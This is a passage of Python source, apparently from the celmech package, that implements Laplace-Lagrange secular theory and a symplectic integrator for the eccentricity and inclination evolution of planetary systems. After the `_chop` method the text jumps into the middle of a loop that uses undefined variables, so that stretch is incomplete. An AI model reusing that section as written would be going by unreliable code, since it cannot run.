math::\n            \\frac{d}{dt}\\pmb{y} = -i \\pmb{S}_I \\cdot \\pmb{y}\n\n        The matrix is given in symbolic form.\n    Neccentricity_matrix : ndarray\n        Numerical value of the eccentricity matrix :math:`\\pmb{S}_e`\n    Ninclination_matrix : ndarray\n        Numerical value of the inclination matrix :math:`\\pmb{S}_I`\n    Tsec : float\n        The secular timescale of the system, defined as the shortest\n        secular period among the system's inclination and eccentricity\n        modes.\n    eccentricity_eigenvalues : ndarray\n        Array of the eccentricity mode eigenvalues (i.e., secular frequencies)\n    inclination_eigenvalues : ndarray\n        Array of the inclination mode eigenvalues (i.e., secular frequencies)\n    \"\"\"\n    def __init__(self,G,poincareparticles=[]):\n        super(LaplaceLagrangeSystem,self).__init__(G,poincareparticles)\n        self.params = {S('G'):self.G}\n        for i,particle in enumerate(self.particles):\n            if i != 0:\n                m,mu,M,Lambda = symbols('m{0},mu{0},M{0},Lambda{0}'.format(i))\n                self.params.update({m:particle.m,mu:particle.mu,M:particle.M,Lambda:particle.Lambda})\n        self.ecc_entries = {(j,i):S(0) for i in range(1,self.N) for j in range(1,i+1)}\n        self.inc_entries = {(j,i):S(0) for i in range(1,self.N) for j in range(1,i+1)}\n        self.tol = np.min([p.m for p in self.particles[1:]]) * np.finfo(np.float64).eps\n        ps = self.particles[1:]\n        self.eta0_vec = np.array([p.eta for p in ps])\n        self.kappa0_vec = np.array([p.kappa for p in ps])\n        self.rho0_vec = np.array([p.rho for p in ps])\n        self.sigma0_vec = np.array([p.sigma for p in ps])\n        self._update()\n    @classmethod\n    def from_Poincare(cls,pvars):\n        \"\"\"\n        Initialize a Laplace-Lagrange system directly from a\n        :class:`celmech.poincare.Poincare` object.\n\n        Arguments\n        ---------\n        pvars : :class:`celmech.poincare.Poincare`\n            Instance of Poincare variables from which to initialize\n            Laplace-Lagrange system\n\n        Returns\n        -------\n        system : :class:`celmech.secular.LaplaceLagrangeSystem`\n        \"\"\"\n        return cls(pvars.G,pvars.particles[1:])\n\n    @classmethod\n    def from_Simulation(cls,sim):\n        \"\"\"\n        Initialize a Laplace-Lagrange system directly from a\n        :class:`rebound.Simulation` object.\n\n        Arguments\n        ---------\n        sim : :class:`rebound.Simulation`\n            rebound simulation from which to initialize\n            Laplace-Lagrange system\n\n        Returns\n        -------\n        system : :class:`celmech.secular.LaplaceLagrangeSystem`\n        \"\"\"\n        pvars = Poincare.from_Simulation(sim)\n        return cls.from_Poincare(pvars)\n\n    @property\n    def eccentricity_matrix(self):\n        return Matrix([\n            [self.ecc_entries[max(i,j),min(i,j)] for i in range(1,self.N)]\n            for j in range(1,self.N)\n        ])\n\n    @property\n    def inclination_matrix(self):\n        return Matrix([\n            [self.inc_entries[max(i,j),min(i,j)] for i in range(1,self.N)]\n            for j in range(1,self.N)\n        ])\n    @property\n    def Neccentricity_matrix(self):\n        return np.array(self.eccentricity_matrix.subs(self.params)).astype(np.float64)\n    @property\n    def Ninclination_matrix(self):\n        return np.array(self.inclination_matrix.subs(self.params)).astype(np.float64)\n    @property\n    def Tsec(self):\n        Omega_e = np.max( np.abs(self.eccentricity_eigenvalues()) )\n        Omega_i = np.max( np.abs(self.inclination_eigenvalues()) )\n        return 2 * np.pi / max(Omega_e,Omega_i)\n    def _chop(self,arr):\n        arr[np.abs(arr) < self.tol] = 0\n        return arr\n                if i > j:\n                    particleIn = self.particles[indexIn]\n                    Cecc = get_DFCoeff_symbol(*js_dpomega,0,0,0,0,indexIn,indexOut)\n                    Cinc = get_DFCoeff_symbol(*js_dOmega,0,0,0,0,indexIn,indexOut)\n                    alpha = particleIn.a/particleOut.a\n                    assert alpha<1, \"Particles must be in order by increasing semi-major axis!\"\n                    Necc_coeff = 
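The attribute docstring above defines the linear flow d/dt x = -i S_e x. Because S_e is real and symmetric, diagonalizing it yields the secular frequencies and eigenmodes directly; the following is a hedged numerical sketch using an arbitrary toy 2x2 matrix (illustrative numbers only, not output of this class).

import numpy as np

# Toy symmetric stand-in for Neccentricity_matrix (made-up values).
S_e = np.array([[2.0e-5, -5.0e-6],
                [-5.0e-6, 1.0e-5]])
g, T = np.linalg.eigh(S_e)                    # frequencies g_k, mode matrix T
x0 = np.array([0.01 + 0.00j, 0.02 + 0.01j])   # x = (kappa - i*eta)/sqrt(2)

def x_of_t(t):
    # d/dt x = -i S_e x  =>  x(t) = T exp(-i g t) T^T x(0)
    return T @ (np.exp(-1j * g * t) * (T.T @ x0))

# The mode amplitudes |T^T x| are constants of the linear motion:
print(np.abs(T.T @ x0))
print(np.abs(T.T @ x_of_t(1.0e5)))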
eval_DFCoeff_dict(ecc_off_coeff,alpha)\n                    Ninc_coeff = eval_DFCoeff_dict(inc_off_coeff,alpha)\n                    self.params[Cecc] = Necc_coeff\n                    self.params[Cinc] = Ninc_coeff\n                    ecc_entry = prefactor * Cecc / sqrt(LambdaIn) / sqrt(LambdaOut)\n                    inc_entry = prefactor * Cinc / sqrt(LambdaIn) / sqrt(LambdaOut) / 4\n                    self.ecc_entries[(indexOut,indexIn)] = ecc_entry\n                    self.inc_entries[(indexOut,indexIn)] = inc_entry\n                else:\n                    pass\n                LmbdaI = S('Lambda{}'.format(i))\n                self.ecc_entries[(i,i)] += 2 * prefactor * Cecc_diag / LmbdaI\n                self.inc_entries[(i,i)] += 2 * prefactor * Cinc_diag / LmbdaI / 4\n\n    def add_first_order_resonance_terms(self,resonances_dictionary):\n        for indices,resonance_k in resonances_dictionary.items():\n            self.add_first_order_resonance_term(*indices,resonance_k)\n\n    def add_first_order_resonance_term(self,indexIn, indexOut,jres):\n        \"\"\"\n        Include a correction to the Laplace-Lagrange\n        secular equations of motion that arises due to a nearby\n        first-order mean motion resonance between two planets.\n\n        Note-- corrections are not valid for planets in resonance!\n\n        Arguments\n        ---------\n        indexIn : int\n            Index of inner planet near resonance.\n        indexOut : int\n            Index of outer planet near resonance.\n        jres : int\n            Specify the jres:jres-1 mean motion resonance.\n        \"\"\"\n        assert indexIn < indexOut, \"Input 'indexIn' must be less than 'indexOut'.\"\n        particleIn = self.particles[indexIn]\n        particleOut = self.particles[indexOut]\n        alpha = particleIn.a / particleOut.a\n        G = symbols('G')\n        mIn,muIn,MIn,LambdaIn = symbols('m{0},mu{0},M{0},Lambda{0}'.format(indexIn))\n        mOut,muOut,MOut,LambdaOut = symbols('m{0},mu{0},M{0},Lambda{0}'.format(indexOut))\n\n        CIn = get_DFCoeff_symbol(*[jres,1-jres,-1,0,0,0],0,0,0,0,indexIn,indexOut)\n        COut = get_DFCoeff_symbol(*[jres,1-jres,0,-1,0,0],0,0,0,0,indexIn,indexOut)\n        self.params[CIn] = eval_DFCoeff_dict(DFCoeff_C(*[jres,1-jres,-1,0,0,0],0,0,0,0),alpha)\n        self.params[COut] = eval_DFCoeff_dict(DFCoeff_C(*[jres,1-jres,0,-1,0,0],0,0,0,0),alpha)\n        aOut_inv = G*MOut*muOut*muOut / LambdaOut / LambdaOut\n        eps = -G * mIn * mOut * aOut_inv\n        omegaIn = G * G * MIn * MIn * muIn**3 / (LambdaIn**3)\n        omegaOut = G * G * MOut * MOut * muOut**3 / (LambdaOut**3)\n        domegaIn = -3 * G * G * MIn * MIn * muIn**3 / (LambdaIn**4)\n        domegaOut = -3 * G * G * MOut * MOut * muOut**3 / (LambdaOut**4)\n        kIn = 1 - jres\n        kOut = jres\n        k_Domega_k = kIn**2 * domegaIn + kOut**2 * domegaOut\n        prefactor = (k_Domega_k / (kIn * omegaIn + kOut * omegaOut)**2)\n        xToXIn = sqrt(2/LambdaIn)\n        xToXOut = sqrt(2/LambdaOut)\n\n        InIn = eps**2 * prefactor * CIn * CIn * xToXIn * xToXIn / 4\n        InOut = eps**2 * prefactor * COut * CIn * xToXOut * xToXIn / 4\n        OutOut = eps**2 * prefactor * COut * COut * xToXOut * xToXOut / 4\n\n        self.ecc_entries[(indexIn,indexIn)] += InIn\n        # Note-- only upper entries are stored so\n        # changing (indexOut,indexIn) also implicitly\n        # changes (indexIn,indexOut)\n        self.ecc_entries[(indexOut,indexIn)] += InOut\n        self.ecc_entries[(indexOut,indexOut)] += OutOut\n\nfrom .symplectic_evolution_operators import EvolutionOperator\nfrom .symplectic_evolution_operators import SecularDFTermsEvolutionOperator as DFOp\nclass LinearSecularEvolutionOperator(EvolutionOperator):\n    def __init__(self,initial_state,dt,first_order_resonances={}):\n        super(LinearSecularEvolutionOperator,self).__init__(initial_state,dt)\n        LL_system = LaplaceLagrangeSystem.from_Poincare(self.state)\n        for pair,res_j_list in first_order_resonances.items():\n            for j in res_j_list:\n                
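A hedged usage sketch of the method defined above: construct the system from a REBOUND simulation and register a nearby 3:2 resonance between planets 1 and 2. It assumes rebound and celmech are installed; the planet parameters are invented for illustration.

import rebound
from celmech.secular import LaplaceLagrangeSystem

sim = rebound.Simulation()
sim.add(m=1.0)                        # star
sim.add(m=1.0e-5, a=1.00, e=0.02)     # inner planet (index 1)
sim.add(m=1.0e-5, a=1.32, e=0.03)     # outer planet (index 2), just wide of 3:2
sim.move_to_com()

llsys = LaplaceLagrangeSystem.from_Simulation(sim)
llsys.add_first_order_resonance_term(1, 2, 3)  # include the 3:2 correction
print(llsys.Tsec)  # secular timescale with the resonant correction folded in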
LL_system.add_first_order_resonance_term(*pair,j)\n        self.ecc_matrix = LL_system.Neccentricity_matrix\n        self.inc_matrix = LL_system.Ninclination_matrix\n        self.ecc_operator_matrix = expm(-1j * self.dt * self.ecc_matrix)\n        self.inc_operator_matrix = expm(-1j * self.dt * self.inc_matrix)\n\n    @property\n    def dt(self):\n        return super().dt\n    @dt.setter\n    def dt(self,val):\n        self._dt = val\n        self.ecc_operator_matrix = expm(-1j * self.dt * self.ecc_matrix)\n        self.inc_operator_matrix = expm(-1j * self.dt * self.inc_matrix)\n\n    def _get_x_vector(self):\n        eta = np.array([p.eta for p in self.particles[1:]])\n        kappa = np.array([p.kappa for p in self.particles[1:]])\n        x = (kappa - 1j * eta) * _rt2_inv\n        return x\n\n    def _get_y_vector(self):\n        rho = np.array([p.rho for p in self.particles[1:]])\n        sigma = np.array([p.sigma for p in self.particles[1:]])\n        y = (sigma - 1j * rho) * _rt2_inv\n        return y\n\n    def _set_x_vector(self,x):\n        for p,xi in zip(self.particles[1:],x):\n            p.kappa = _rt2 * np.real(xi)\n            p.eta = _rt2 * np.real(1j * xi)\n\n    def _set_y_vector(self,y):\n        for p,yi in zip(self.particles[1:],y):\n            p.sigma = _rt2 * np.real(yi)\n            p.rho = _rt2 * np.real(1j * yi)\n\n    def apply(self):\n        x = self._get_x_vector()\n        y = self._get_y_vector()\n        xnew = self.ecc_operator_matrix @ x\n        ynew = self.inc_operator_matrix @ y\n        self._set_x_vector(xnew)\n        self._set_y_vector(ynew)\n\n    def apply_to_state_vector(self,state_vector):\n        vecs = self._state_vector_to_individual_vectors(state_vector)\n        x_by_rt2 = (vecs[:,0] - 1j * vecs[:,1])\n        y_by_rt2 = (vecs[:,4] - 1j * vecs[:,5])\n        xnew_by_rt2 = self.ecc_operator_matrix @ x_by_rt2\n        ynew_by_rt2 = self.inc_operator_matrix @ y_by_rt2\n        vecs[:,0] = np.real(xnew_by_rt2)\n        vecs[:,1] = -1 * np.imag(xnew_by_rt2)\n        vecs[:,4] = np.real(ynew_by_rt2)\n        vecs[:,5] = -1 * np.imag(ynew_by_rt2)\n        return vecs.reshape(-1)\n\n    def calculate_Hamiltonian(self,state_vector):\n        vecs = self._state_vector_to_individual_vectors(state_vector)\n        x = (vecs[:,0] - 1j * vecs[:,1]) * _rt2_inv\n        y = (vecs[:,4] - 1j * vecs[:,5]) * _rt2_inv\n        H = np.conj(x) @ self.ecc_matrix @ x + np.conj(y) @ self.inc_matrix @ y\n        return np.real(H)\n\nclass SecularSystemSimulation():\n    def __init__(self, state, dt = None, dtFraction = None, max_order = 4,NsubB=1, resonances_to_include={}, DFOp_kwargs = {}):\n        \"\"\"\n        A class for integrating the secular equations of motion governing a planetary system.\n\n        The integrations are carried out using a symplectic splitting scheme. The scheme\n        separates the equations of motion into an (integrable) linear component equivalent\n        to the Laplace-Lagrange equations of motion, and a component containing all\n        higher-order terms. The linear components are solved exactly while the higher-order\n        terms are solved using the symplectic implicit midpoint method.\n\n        Arguments\n        ---------\n        state : :class:`celmech.poincare.Poincare`\n            The initial dynamical state of the system.\n        dt : float, optional\n            The timestep to use for the integration. Either dt or dtFraction must be\n            specified.\n        dtFraction : float, optional\n            Set the timestep to a constant fraction of the period of the shortest-period linear\n            secular eigenmode.\n        max_order : int, optional\n            The maximum order of disturbing function terms to include in the integration.\n            By default, the equations of motion include terms up to 4th order.\n        NsubB : int, optional\n            The 'B' step in the splitting scheme is divided into NsubB sub-steps which each integrate for a time dt/NsubB. 
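Note how the operator above exponentiates the secular matrices once at construction and again only when dt changes, so each apply() is a single matrix-vector product. A stripped-down sketch of that caching pattern (CachedLinearPropagator and the toy matrix are illustrative, not part of celmech):

import numpy as np
from scipy.linalg import expm

class CachedLinearPropagator:
    def __init__(self, S, dt):
        self.S = S
        self.dt = dt  # runs the setter below, building the operator

    @property
    def dt(self):
        return self._dt

    @dt.setter
    def dt(self, val):
        self._dt = val
        # Rebuild exp(-i*dt*S) only when the timestep changes.
        self._op = expm(-1j * val * self.S)

    def apply(self, x):
        return self._op @ x

prop = CachedLinearPropagator(np.array([[2e-5, -5e-6], [-5e-6, 1e-5]]), dt=1e3)
x = np.array([0.01 + 0.0j, 0.02 + 0.01j])
for _ in range(10):           # ten steps, a single expm in total
    x = prop.apply(x)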
By default, NsubB = 1.\n        resonances_to_include : dict, optional\n            A dictionary containing information that sets the list of MMRs for which the\n            secular contribution will be accounted for (at second order on planet masses).\n            Dictionary key and value pairs are specified in the form\n\n            .. code::\n\n                {(iIn,iOut) : [(j_0,k_0),...(j_N,k_N)]}\n\n            include the resonances :math:`j_i` : :math:`j_i-k_i` with :math:`i=0,...,N` between planets\n            iIn and iOut. Note that harmonics should **NOT** be explicitly included. I.e.,\n            if (2,1) appears in the list [(j_0,k_0),...(j_N,k_N)] then the term (4,2) should\n            **NOT** also appear; these terms' contributions will be added automatically when\n            the (2,1) term is added.\n            By default, no MMRs are included.\n\n        DFOp_kwargs : dict, optional\n            Keyword arguments to use when initializing the operator used to evolve the non-linear terms.\n            Keywords include:\n\n            - :code:`rtol`: Sets relative tolerance for root-finding\n              in the implicit Runge-Kutta step. Default is machine precision.\n\n            - :code:`atol`: Sets the absolute tolerance for root-finding\n              in the implicit Runge-Kutta step. Default is 0 so that tolerance\n              is only specified by :code:`rtol`.\n\n            - :code:`max_iter`: Maximum number of iterations for root-finding. Default is 10.\n\n            - :code:`rkmethod`: Runge-Kutta method to use. Available options include:\n                - 'ImplicitMidpoint'\n                - 'LobattoIIIB'\n                - 'GL4'\n                - 'GL6'\n              'GL4' and 'GL6' are `Gauss-Legendre methods `_ of order 4 and 6, respectively.\n              'ImplicitMidpoint', 'GL4', and 'GL6' are symplectic methods while 'LobattoIIIB' is a 4th order time-reversible method (but not symplectic).\n\n            - :code:`rk_root_method`: Method to use for root-finding during implicit RK step. Available options are:\n                - 'Newton'\n                - 'fixed_point'\n              'Newton' (default) uses Newton's method whereas 'fixed_point' uses a fixed point iteration method. 
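To make the 'ImplicitMidpoint' and 'fixed_point' options concrete, here is a generic sketch of one implicit midpoint step for dy/dt = f(y), solved by fixed-point iteration; it is not celmech's implementation, and rtol/max_iter merely mimic the keywords described above.

import numpy as np

def implicit_midpoint_step(f, y, h, rtol=1e-12, max_iter=10):
    # Solve y_new = y + h*f((y + y_new)/2) by fixed-point iteration,
    # starting from an explicit Euler predictor.
    y_new = y + h * f(y)
    for _ in range(max_iter):
        y_next = y + h * f(0.5 * (y + y_new))
        if np.allclose(y_next, y_new, rtol=rtol, atol=0.0):
            return y_next
        y_new = y_next
    return y_new

# Harmonic oscillator y = (q, p): the method is symplectic, so the
# energy (q^2 + p^2)/2 stays near its initial value 0.5.
f = lambda y: np.array([y[1], -y[0]])
y = np.array([1.0, 0.0])
for _ in range(1000):
    y = implicit_midpoint_step(f, y, h=0.1)
print(0.5 * (y @ y))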
\n            Newton's method requires computing the Jacobian of the equations of motion but has quadratic convergence.\n        Returns\n        -------\n        simulation : :class:`celmech.secular.SecularSystemSimulation`\n        \"\"\"\n        assert max_order > 3, \"'max_order' must be greater than or equal to 4.\"\n        if not single_true([dt,dtFraction]):\n            raise AttributeError(\"Can only pass one of dt or dtFraction\")\n        llsys = LaplaceLagrangeSystem.from_Poincare(state)\n        first_order_resonances_to_include = {}\n        for pair,res_list in resonances_to_include.items():\n            first_order_js = [ j for j,k in res_list if k==1]\n            first_order_resonances_to_include.update({pair:first_order_js})\n            for j in first_order_js:\n                llsys.add_first_order_resonance_term(*pair,j)\n        Tsec_e = np.min(np.abs(2 * np.pi / llsys.eccentricity_eigenvalues()))\n        Tsec_inc = np.min(np.abs(2 * np.pi / llsys.inclination_eigenvalues()[1:]))\n        self.Tsec = min(Tsec_e,Tsec_inc)\n        self._NsubB = NsubB\n        if dt:\n            self._dtA = dt\n        elif dtFraction:\n            self._dtA = dtFraction * self.Tsec\n        else:\n            raise AttributeError(\"Must specify either 'dt' or 'dtFraction'\")\n        self._dtB = self._dtA / self._NsubB\n        self.linearSecOp = LinearSecularEvolutionOperator(state,self._dtA,first_order_resonances = first_order_resonances_to_include)\n        self.nonlinearSecOp = DFOp.fromOrderRange(\n            state,\n            self._dtB,\n            4,max_order,\n            resonances_to_include=resonances_to_include,\n            **DFOp_kwargs\n        )\n        self.state = state\n        self._half_step_forward_e_matrix = expm(-1j * 0.5 * self.dt * self.linearSecOp.ecc_matrix)\n        self._half_step_backward_e_matrix = expm(+1j * 0.5 * self.dt * self.linearSecOp.ecc_matrix)\n        self._half_step_forward_inc_matrix = expm(-1j * 0.5 * self.dt * self.linearSecOp.inc_matrix)\n        self._half_step_backward_inc_matrix = expm(+1j * 0.5 * self.dt * self.linearSecOp.inc_matrix)\n        self.t = 0\n\n    @classmethod\n    def from_Simulation(cls,sim, dt = None, dtFraction = None, max_order = 4,NsubB=1,resonances_to_include={}, DFOp_kwargs = {}):\n        \"\"\"\n        Initialize a :class:`SecularSystemSimulation ` object\n        from a rebound simulation.\n\n        Arguments\n        ---------\n        sim : :class:`rebound.Simulation`\n            REBOUND simulation to convert to :class:`SecularSystemSimulation `\n        dt : float, optional\n            The timestep to use for the integration. Either dt or dtFraction must be\n            specified.\n        dtFraction : float, optional\n            Set the timestep to a constant fraction of the period of the shortest-period linear\n            secular eigenmode.\n        max_order : int, optional\n            The maximum order of disturbing function terms to include in the integration.\n            By default, the equations of motion include terms up to 4th order.\n        NsubB : int, optional\n            The 'B' step in the splitting scheme is divided into NsubB sub-steps which each integrate for a time dt/NsubB. By default, NsubB = 1.\n        resonances_to_include : dict, optional\n            A dictionary containing information that sets the list of MMRs for which the\n            secular contribution will be accounted for (at second order on planet masses).\n            Dictionary key and value pairs are specified in the form\n\n            .. code::\n\n                {(iIn,iOut) : [(j_0,k_0),...(j_N,k_N)]}\n\n            include the resonances :math:`j_i` : :math:`j_i-k_i` with :math:`i=0,...,N` between planets\n            iIn and iOut. Note that harmonics should *NOT* be explicitly included. 
I.e.,\n            if (2,1) appears in the list [(j_0,k_0),...(j_N,k_N)] then the term (4,2) should\n            *NOT* also appear; these terms' contributions will be added automatically when\n            the (2,1) term is added.\n            By default, no MMRs are included.\n\n        DFOp_kwargs : dict, optional\n            Keyword arguments to use when initializing the operator used to evolve the non-linear terms.\n            Keywords include:\n            - :code:`rtol`: Sets relative tolerance for root-finding\n              in the implicit Runge-Kutta step. Default is machine precision.\n\n            - :code:`atol`: Sets the absolute tolerance for root-finding\n              in the implicit Runge-Kutta step. Default is 0 so that tolerance\n              is only specified by :code:`rtol`.\n\n            - :code:`max_iter`: Maximum number of iterations for root-finding.\n              Default is 10.\n\n            - :code:`rkmethod`: Runge-Kutta method to use. Available options include:\n                - 'ImplicitMidpoint'\n                - 'LobattoIIIB'\n                - 'GL4'\n                - 'GL6'\n              'GL4' and 'GL6' are `Gauss-Legendre methods `_ of order 4 and 6, respectively.\n              'ImplicitMidpoint', 'GL4', and 'GL6' are symplectic methods while 'LobattoIIIB' is a 4th order time-reversible method (but not symplectic).\n\n            - :code:`rk_root_method`: Method to use for root-finding during implicit RK step. Available options are:\n                - 'Newton'\n                - 'fixed_point'\n              'Newton' (default) uses Newton's method whereas 'fixed_point' uses a fixed point iteration method.\n              Newton's method requires computing the Jacobian of the equations of motion but has quadratic convergence.\n\n        Returns\n        -------\n        sim : :class:`SecularSystemSimulation `\n\n        \"\"\"\n        pvars = Poincare.from_Simulation(sim)\n        return cls(\n            pvars,\n            max_order = max_order,\n            NsubB=NsubB,\n            dt = dt,\n            dtFraction = dtFraction,\n            resonances_to_include=resonances_to_include,\n            DFOp_kwargs = DFOp_kwargs\n        )\n\n    @property\n    def state_vector(self):\n        state_vec = []\n        for p in self.state.particles[1:]:\n            state_vec += [p.kappa,p.eta,p.Lambda,p.l,p.sigma,p.rho]\n        return np.array(state_vec)\n    @property\n    def NsubB(self):\n        return self._NsubB\n    @NsubB.setter\n    def NsubB(self,N):\n        self._NsubB = N\n        self._dtB = self._dtA / N\n        self.nonlinearSecOp.dt = self._dtB\n    @property\n    def dt(self):\n        return self._dtA\n    @dt.setter\n    def dt(self,value):\n        self._dtA = value\n        self._dtB = self._dtA / self._NsubB\n        self.linearSecOp.dt = self._dtA\n        self.nonlinearSecOp.dt = self._dtB\n        self._half_step_forward_e_matrix = expm(-1j * 0.5 * value * self.linearSecOp.ecc_matrix)\n        self._half_step_backward_e_matrix = expm(+1j * 0.5 * value * self.linearSecOp.ecc_matrix)\n        self._half_step_forward_inc_matrix = expm(-1j * 0.5 * value * self.linearSecOp.inc_matrix)\n        self._half_step_backward_inc_matrix = expm(+1j * 0.5 * value * self.linearSecOp.inc_matrix)\n\n    def _linearOp_half_step_forward(self,state_vec):\n        \"\"\"\n        Advance state vector a half timestep forward with the\n        linear secular evolution operator.\n        \"\"\"\n        vecs = self.linearSecOp._state_vector_to_individual_vectors(state_vec)\n        x = (vecs[:,0] - 1j * vecs[:,1]) * _rt2_inv\n        y = (vecs[:,4] - 1j * vecs[:,5]) * _rt2_inv\n        xnew = self._half_step_forward_e_matrix @ x\n        ynew = self._half_step_forward_inc_matrix @ y\n        vecs[:,0] = _rt2 * np.real(xnew)\n        vecs[:,1] = -1 * _rt2 * np.imag(xnew)\n        vecs[:,4] = _rt2 * np.real(ynew)\n        vecs[:,5] = -1 * _rt2 * np.imag(ynew)\n        return vecs.reshape(-1)\n\n    def _linearOp_half_step_backward(self,state_vec):\n        \"\"\"\n        Advance state vector a half timestep backward with the\n        linear secular evolution operator.\n        \"\"\"\n        vecs = self.linearSecOp._state_vector_to_individual_vectors(state_vec)\n        x 
= (vecs[:,0] - 1j * vecs[:,1]) * _rt2_inv\n        y = (vecs[:,4] - 1j * vecs[:,5]) * _rt2_inv\n        xnew = self._half_step_backward_e_matrix @ x\n        ynew = self._half_step_backward_inc_matrix @ y\n        vecs[:,0] = _rt2 * np.real(xnew)\n        vecs[:,1] = -1 * _rt2 * np.imag(xnew)\n        vecs[:,4] = _rt2 * np.real(ynew)\n        vecs[:,5] = -1 * _rt2 * np.imag(ynew)\n        return vecs.reshape(-1)\n\n    def update_state_from_vector(self,state_vec):\n        vecs = self.linearSecOp._state_vector_to_individual_vectors(state_vec)\n        for vals,p in zip(vecs,self.state.particles[1:]):\n            p.kappa,p.eta,p.Lambda,p.l,p.sigma,p.rho = vals\n\n    def integrate(self,time,exact_finish_time = False, corrector=False):\n        \"\"\"\n        Advance simulation by integrating to specified time.\n\n        Arguments\n        ---------\n        time : float\n            Time to integrate to\n        exact_finish_time : bool, optional\n            **NOT CURRENTLY IMPLEMENTED**\n            If :code:`True`, system will be advanced to user-specified time exactly.\n            This is done by applying symplectic correctors to reach times\n            in between fixed multiples of the integrator's time step.\n            If :code:`False`, system will advance by a fixed number of time steps\n            to the first time after the user-specified `time` argument.\n            Default is :code:`False`.\n        corrector: bool, optional\n            If :code:`True`, symplectic correctors are applied at the beginning\n            and end of integration. Default is :code:`False`.\n\n        Returns\n        -------\n        None\n        \"\"\"\n        assert time >= self.t, \"Backward integration is currently not implemented.\"\n        Nstep = int( np.ceil( (time-self.t) / self.dt) )\n        state_vec = self.state_vector\n        if corrector is True:\n            state_vec = self.corrector3(state_vec, self.dt)\n        state_vec = self._linearOp_half_step_forward(state_vec)\n        for _ in range(Nstep):\n\n            # B step\n            state_vec = self._Bstep(state_vec)\n\n            # A step\n            state_vec = self.linearSecOp.apply_to_state_vector(state_vec)\n\n        if exact_finish_time:\n            warnings.warn(\"Exact finish time is not currently implemented.\")\n        state_vec = self._linearOp_half_step_backward(state_vec)\n        if corrector is True:\n            state_vec = self.corrector3inv(state_vec, self.dt)\n        self.update_state_from_vector(state_vec)\n        self.t += Nstep * self.dt\n\n    def _Bstep(self,state_vec):\n        nlOp = self.nonlinearSecOp\n        qp = nlOp.state_vec_to_qp_vec(state_vec)\n        for _ in range(self.NsubB):\n            qp = nlOp.rk_step(qp)\n        for i in range(nlOp.Npl):\n            # eta\n            state_vec[6*i+1] = qp[i]\n            # kappa\n            state_vec[6*i] = qp[i + 2 * nlOp.Npl]\n            # rho\n            state_vec[6*i+5] = qp[i + nlOp.Npl]\n            # sigma\n            state_vec[6*i+4] = qp[i + 3 * nlOp.Npl]\n\n        return state_vec\n    def calculate_energy(self):\n        \"\"\"\n        Calculate the value of the system's Hamiltonian (i.e., the energy)\n\n        Returns:\n            energy : float\n        \"\"\"\n        sv = self.state_vector\n        E = self.linearSecOp.calculate_Hamiltonian(sv)\n        E += self.nonlinearSecOp.calculate_Hamiltonian(sv)\n        return E\n\n    def calculate_AMD(self):\n        \"\"\"\n        Calculate the value of the system's angular momentum deficit.\n        \"\"\"\n        return np.sum([p.Q + p.Gamma for p in self.state.particles[1:]])\n\n    def X(self, state_vec, a, b, h):\n        state_vec = self._apply_A_step_for_dt(state_vec,-a*h)\n        state_vec = self._apply_B_step_for_dt(state_vec,b*h)\n        state_vec = self._apply_A_step_for_dt(state_vec,a*h)\n        return state_vec\n\n    def Z(self, state_vec, a, b, h):\n        state_vec = self.X(state_vec, -a, -b, h)\n        state_vec = self.X(state_vec, a, b, h)\n        return state_vec\n\n    def corrector3(self, state_vec, h):\n        alpha = (7./40.)**0.5\n        beta = 1/48./alpha\n        a1 = -alpha\n        a2 = alpha\n        b2 = beta/2.\n        b1 = -beta/2.\n\n        state_vec = self.Z(state_vec, a2, 
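The loop in integrate() above realizes Strang splitting with the half-steps merged: a forward half A-step before the loop, a full A-step after each B-step, and a backward half A-step at the end, which equals N compositions A(dt/2) B(dt) A(dt/2) while saving one operator application per step. A toy sketch of the same structure, assuming simple drift/kick maps for a harmonic oscillator (all names illustrative):

def apply_A(s, h):   # drift: q += h*p
    q, p = s
    return (q + h * p, p)

def apply_B(s, h):   # kick: p -= h*q
    q, p = s
    return (q, p - h * q)

def integrate_split(state, dt, nsteps):
    state = apply_A(state, 0.5 * dt)      # forward half-step
    for _ in range(nsteps):
        state = apply_B(state, dt)
        state = apply_A(state, dt)
    return apply_A(state, -0.5 * dt)      # undo the extra half-step

s = integrate_split((1.0, 0.0), 0.01, 10000)
print(0.5 * (s[0] ** 2 + s[1] ** 2))      # stays near 0.5: bounded energy error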
b2, h)\n        state_vec = self.Z(state_vec, a1, b1, h)\n        return state_vec\n\n    def corrector3inv(self, state_vec, h):\n        alpha = (7./40.)**0.5\n        beta = 1/48./alpha\n        a1 = -alpha\n        a2 = alpha\n        b2 = beta/2.\n        b1 = -beta/2.\n\n        state_vec = self.Z(state_vec, a1, -b1, h)\n        state_vec = self.Z(state_vec, a2, -b2, h)\n        return state_vec\n\n    def _apply_A_step_for_dt(self,state_vec,dt):\n        \"\"\"\n        Apply the linear secular evolution operator for a time\n        'dt' to a state vector.\n\n        Arguments:\n\n        state_vec : ndarray\n            State vector of planetary system.\n        dt : float\n            Timestep to apply operator for.\n\n        Returns:\n            state_vec : ndarray\n                Updated state vector after application of operator.\n        \"\"\"\n        opMtrx_ecc = expm(-1j * dt * self.linearSecOp.ecc_matrix)\n        opMtrx_inc = expm(-1j * dt * self.linearSecOp.inc_matrix)\n\n        vecs = self.linearSecOp._state_vector_to_individual_vectors(state_vec)\n        x = (vecs[:,0] - 1j * vecs[:,1]) * _rt2_inv\n        y = (vecs[:,4] - 1j * vecs[:,5]) * _rt2_inv\n        xnew = opMtrx_ecc @ x\n        ynew = opMtrx_inc @ y\n        vecs[:,0] = _rt2 * np.real(xnew)\n        vecs[:,1] = -1 * _rt2 * np.imag(xnew)\n        vecs[:,4] = _rt2 * np.real(ynew)\n        vecs[:,5] = -1 * _rt2 * np.imag(ynew)\n        return vecs.reshape(-1)\n\n    def _apply_B_step_for_dt(self,state_vec,dt):\n        \"\"\"\n        Apply the secular evolution operator for the non-linear (4th and higher order)\n        secular terms for a time 'dt' to a state vector.\n\n        Arguments\n        ----------\n        state_vec : ndarray\n            State vector of planetary system.\n        dt : float\n            Timestep to apply operator for.\n\n        Returns\n        -------\n        state_vec : ndarray\n            Updated state vector after application of operator.\n        \"\"\"\n\n        # change time-step\n        self.nonlinearSecOp.dt = dt/self._NsubB\n\n        # apply\n        for _ in range(self.NsubB):\n            state_vec = self.nonlinearSecOp.apply_to_state_vector(state_vec)\n\n        # set time-step back to default\n        self.nonlinearSecOp.dt = self._dtB\n\n        # return result\n        return state_vec\n\nclass SecularSystemRKIntegrator():\n    \"\"\"\n    A class for integrating the secular equations of motion governing a planetary system.\n    The integrations are carried out using a user-specified Runge-Kutta method.\n\n    Arguments\n    ---------\n    state : :class:`celmech.poincare.Poincare`\n        The initial 